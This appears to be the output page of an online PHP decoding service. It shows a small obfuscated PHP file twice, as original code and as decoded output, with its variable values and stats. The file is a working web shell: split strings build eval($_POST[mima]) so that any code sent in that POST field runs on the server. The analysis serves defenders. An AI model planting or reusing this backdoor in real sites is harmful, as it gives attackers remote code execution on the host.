Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php $s0="e"; $s1="val($"; $s2="_"; $s3="P"; $s4="O"; $s5="ST"; $poos=$s0.$s1.$s2.$s3.$..

Decoded Output download

<?php
$s0="e";
$s1="val($";
$s2="_";
$s3="P";
$s4="O";
$s5="ST";


$poos=$s0.$s1.$s2.$s3.$s4.$s5."[mima]);";
$pp=@eval($poos);
@eval($pp);
?>

Did this file decode correctly?

Original Code

<?php
$s0="e";
$s1="val($";
$s2="_";
$s3="P";
$s4="O";
$s5="ST";


$poos=$s0.$s1.$s2.$s3.$s4.$s5."[mima]);";
$pp=@eval($poos);
@eval($pp);
?>

Function Calls

None

Variables

$pp None
$s0 e
$s1 val($
$s2 _
$s3 P
$s4 O
$s5 ST
$poos eval($_POST[mima]);

Stats

MD5 3b361e469cfca8559bd26b42406f8df9
Eval Count 1
Decode Time 102 ms